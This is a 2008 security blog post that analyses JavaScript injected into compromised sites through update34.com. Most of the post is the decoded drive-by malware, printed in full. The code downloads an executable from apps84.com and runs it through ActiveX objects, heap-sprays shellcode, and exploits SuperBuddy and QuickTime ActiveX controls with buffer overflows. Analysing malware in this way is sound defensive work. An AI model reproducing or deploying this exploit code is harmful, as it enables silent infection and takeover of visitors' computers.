www.update34.com/b.js | s3c-watch

www.update34.com/b.js

This new injected domain will call hidden iframe from http://apps84.com/cgi-bin/index.cgi?ad

index.cgi?ad is an obfuscated JS, which successfully decoded will depending on the browser version and language setting, download code from http://apps84.com/cgi-bin/index.cgi?ffd34c3e0100f0600077e0ed58060000000002b7b2ae43ff%5Bcode]

Interestingly, the code downloaded is another obfuscated javascript. Using the same method of decoding, results in this code

function q37Qot3M(C9a5yGFZ)
{
	var qPjQyRih = "abcdefghiklmnopqrstuvwxyz0123456789";
	var Z4mYjfqe = '';
	for (var ayDbH97x=0; ayDbH97x<C9a5yGFZ; ayDbH97x++) {
		var UxA8KpPP = Math.floor(Math.random() * qPjQyRih.length);
		Z4mYjfqe += qPjQyRih.substring(UxA8KpPP, UxA8KpPP+1);
	}

	return Z4mYjfqe;
}

function rRr2voNt(gqzRhsXa, zDW_Nrnc)
{
	var UqeZTIIs = null;
	var ewf9BHSL = 'UqeZTIIs=gqzRhsXa.';
	var pb4SCZne = new Array(
		'CreateObject(zDW_Nrnc)',
		'CreateObject(zDW_Nrnc, "")',
		'CreateObject(zDW_Nrnc, "", "")',
		'GetObject("", zDW_Nrnc)',
		'GetObject(zDW_Nrnc, "")',
		'GetObject(zDW_Nrnc)'
	);

	var ibygzrSi=0;

	while(!UqeZTIIs && ibygzrSi < pb4SCZne.length) {
		try {
			eval(ewf9BHSL+pb4SCZne[ibygzrSi]);
		} catch(e) { }

		ibygzrSi++;
	}
	
	return UqeZTIIs;
}

function EQnpdJ3R(rDx3Y3YK, nmg1Ya8Z)
{

	try {
		rDx3Y3YK.open("GET", nmg1Ya8Z, false);
		rDx3Y3YK.send(null);

	} catch(e) { return 0; }

	return rDx3Y3YK.responseBody;
}


function iFzeRt3v(kJVv5iSV, GGib1Bbs, nlpYQQkD)
{

	try {
		kJVv5iSV.Type = 1;
		kJVv5iSV.Mode = 3;
		kJVv5iSV.Open();
		kJVv5iSV.Write(nlpYQQkD);
		kJVv5iSV.SaveToFile(GGib1Bbs, 2);
		kJVv5iSV.Close();
	} catch(e) { return 0; }

	return 1;
}

function l8NTJVdS(fjt4aEGK, rDx3Y3YK, kJVv5iSV, f8ooKsQo, GFWQLQNh)
{
	var ybDUybhC = 0;
	var HgFYBJZD = EQnpdJ3R(rDx3Y3YK, fjt4aEGK);

	if (HgFYBJZD != 0) {
		var lJ99WYEL = "c:\\"+q37Qot3M(6)+".exe";

		if (iFzeRt3v(kJVv5iSV, lJ99WYEL, HgFYBJZD) == 1) {
			if (GFWQLQNh == 0) {
				try {
					f8ooKsQo.Run(lJ99WYEL, 0);
					ybDUybhC = 1;
				} catch(e) { }
			} else {
				try {
					f8ooKsQo.ShellExecute(lJ99WYEL, "", "", "open", 0);
					ybDUybhC = 1;
				} catch(e) { }
			}
		}
	}

	return ybDUybhC;
}

function GpU6LOfo()
{
	var rEoXWlfi = 0;
	var bc_CUBHX = 1;
	var VGCo6zkO = "http://apps84.com/cgi-bin/index.cgi?ff4a457c0100f0600277e0ed58060000000002b72ba2710001040900000000020";
	var kf4nCFPY = new Array(null, null, null);

	try {
		var nAn0J9zC = 0;
		var rv9jQ4yP = document.createElement("object");
		rv9jQ4yP.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

		if (rv9jQ4yP) {
			kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "msxml2.XMLHTTP");
			if (!kf4nCFPY[0])
				kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "Microsoft.XMLHTTP");
			
			if (!kf4nCFPY[0])
				kf4nCFPY[0] = rRr2voNt(rv9jQ4yP, "MSXML2.ServerXMLHTTP");

			kf4nCFPY[1] = rRr2voNt(rv9jQ4yP, "ADODB.Stream");

			kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "WScript.Shell");

			if (!kf4nCFPY[2]) {
				kf4nCFPY[2] = rRr2voNt(rv9jQ4yP, "Shell.Application");
				if (kf4nCFPY[2]) nAn0J9zC = 1;
			}
		}

		if (kf4nCFPY[0] && kf4nCFPY[1] && kf4nCFPY[2]) {
			for(var ELxcGHTj=0;ELxcGHTj<bc_CUBHX;ELxcGHTj++) {
				var GH3tzsho = l8NTJVdS(VGCo6zkO+ELxcGHTj.toString(), kf4nCFPY[0], kf4nCFPY[1], kf4nCFPY[2], nAn0J9zC);

				if (!rEoXWlfi)
					rEoXWlfi = GH3tzsho;
			}
		}

	} catch(e) {}

	return rEoXWlfi;
}

function z15QLzDF(NpTt78SK, vyRa5Vhw)
{
	try {

		var bcUSP1AU = new Date();
		bcUSP1AU.setDate(bcUSP1AU.getDate() + 120000);

		if (NpTt78SK) {
			document.cookie =
				"id=" + NpTt78SK +
				"; path=/" +
				"; expires=" + bcUSP1AU.toGMTString();
		}

		if (vyRa5Vhw) {
			document.cookie =
				"addt=" + vyRa5Vhw +
				"; path=/" +
				"; expires=" + bcUSP1AU.toGMTString();
		}


	} catch(e) {
	}
}

var lajutPnm = new Array();
var xnyWSACx = 0;

function t02H59nf()
{
	lajutPnm = lajutPnm;
	setTimeout(t02H59nf, 100);
}

function wuWdTHTE(qXNjDqmd, aDNIjIpy)
{
	while (qXNjDqmd.length*2<aDNIjIpy)
		qXNjDqmd += qXNjDqmd;

	qXNjDqmd = qXNjDqmd.substring(0,aDNIjIpy/2);
	return qXNjDqmd;
}

function S3czSfbD()
{
	if (!xnyWSACx) {
		var V2dJq4HP = 0x0c0c0c0c;
		var qsNDyV7P = unescape("%u00e8%u0000%u5d00%uc583%ub914%u018d%u0000%ue4b0%u4530%u4500%u7549%uebf9%u7400%u7474%u7474%u7474%u0d74%ue418%ue4e4%u80bb%ud445%ue4e4%u9ce4%u6fe8%ue8a4%u946f%u49f8%u8c6f%u0fec%u6fed%ud0a4%ua469%u6f98%ud88c%u136f%ue08e%u0cbd%ue46b%ue4e4%u1d06%u8b8c%ue48a%u8ce4%u9691%u8988%u1bb0%u6ff2%u0c0c%ue49d%ue4e4%u336f%u64a3%ue4db%u1e91%ub3a3%u64a3%ue4db%u1e91%u0b6f%ud7bb%u652d%ue008%ue4e5%u6fe4%ub538%ub7b6%ue08c%ue4e5%u1be4%ue8b2%ubdbe%ub6b5%ue66f%ua7b7%udf64%u91e4%u651e%u189f%u81ca%u819c%ue791%u0f67%u6dec%u23e7%ue0a7%u81ca%u819c%ua722%ue4ec%u6ebf%ue025%u6cd4%ue4a1%u24d7%ub4b4%ub3b7%u1bb4%uf4b2%u1c67%u91e4%u8ee2%ub7e5%ub21b%ubee0%u67bd%ue026%u64a5%ue4de%u5091%ub21b%ub5ec%u6fb2%ud891%u906f%u9cca%u11e7%u6fb2%uc492%u11e7%u2dd7%ua5ad%ue749%ud721%ueb3f%uf45a%u32de%uec90%u2f25%ue7e9%ua43e%u150f%ufbdf%u0391%u6fba%uc0ba%u39e7%u6f82%uafe8%uba6f%ue7f8%u6f39%u6fe0%u21e7%uba4f%u27bd%u1b0c%u1b1a%u6a1b%ueaaa%u7c08%u6e1a%u9aea%u063c%ud797%u6e2e%ud2bf%ucbfe%u9494%u8c83%ue4a3%u908c%u9490%ucbde%u85cb%u9494%udc97%ucad0%u8b87%ucb89%u8387%uc98d%u8d86%ucb8a%u8a8d%u8180%uca9c%u8387%udb8d%u8282%u85d0%ud1d0%u87d3%ud5d4%ud4d4%ud482%ud4d2%ud6d4%ud3d3%ud481%u8081%udcd1%ud2d4%ud4d4%ud4d4%ud4d4%ud4d4%ud6d4%ud386%u86d6%ud685%ud5d3%ud4d4%ud5d4%ud0d4%uddd4%ud4d4%ud4d4%ud4d4%ud4d4%udcd4%ue4d4");
		var yuVqerxP = 0x400000;
		var FDatJxfq = qsNDyV7P.length * 2;
		var aDNIjIpy = yuVqerxP - (FDatJxfq+0x38);
		var qXNjDqmd = unescape("%u0c0c%u0c0c");

		qXNjDqmd = wuWdTHTE(qXNjDqmd,aDNIjIpy);
		var NGNogBza = (V2dJq4HP - 0x400000)/yuVqerxP;
	
		for (var U4Dn_RUx=0;U4Dn_RUx<NGNogBza;U4Dn_RUx++) {
			lajutPnm[U4Dn_RUx] = qXNjDqmd + qsNDyV7P;
		}

		xnyWSACx = 1;
		t02H59nf();
	}


	return 0;
}

function JgIeEAxw() {

	try {
		var YNu_L1Ip = new ActiveXObject('Sb.SuperBuddy');

		if (YNu_L1Ip) {
			S3czSfbD();
			z15QLzDF(9);
			YNu_L1Ip.LinkSBIcons(0x0c0c0c0c);
		}
	} catch(e) {
	}

	return 0;
}

function zmpCkFBI()
{
	try {
		var plv4KWFi = new ActiveXObject("QuickTime.QuickTime.4");

		if (plv4KWFi) {
			S3czSfbD();
			var mk84Pufq = "";
			for(var Zxae7BbE=0;Zxae7BbE<200;Zxae7BbE++) {
				mk84Pufq += "AAAA";
			}

			mk84Pufq += "AAA";

			for(var Zxae7BbE=0;Zxae7BbE<3;Zxae7BbE++) {
				mk84Pufq += "\x0c\x0c\x0c\x0c";
			}

			var Et27CeXt =
				'' +
				'' +
				'' +
				'' +
				'<param name="qtnext1" value="T">' +
				'' +
				'';

			gAqc_6tX = 0;
			var eBUg1ask = document.createElement("div");
			eBUg1ask.innerHTML = Et27CeXt;
			z15QLzDF(6);
			document.body.appendChild(eBUg1ask);

		}
	} catch(e) {
	}

	return 0;
}
if (GpU6LOfo() || JgIeEAxw() || zmpCkFBI()
) {
	document.XQYxMigz = 'about:blank';
} else {
	document.XQYxMigz = 'about:blank';
}

/*setTimeout(function() {
	if (document.gAqc_6tX && document.mEWDIx_N && document.Z4lSVtbt) {
		setTimeout("window.location = '" + document.XQYxMigz + "';", 1000);
	} else {
		setTimeout(arguments.callee, 1000);
	}
}, 1000);*/

This entry was posted on June 25, 2008 at 9:54 pm and is filed under sql injection. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a comment Cancel reply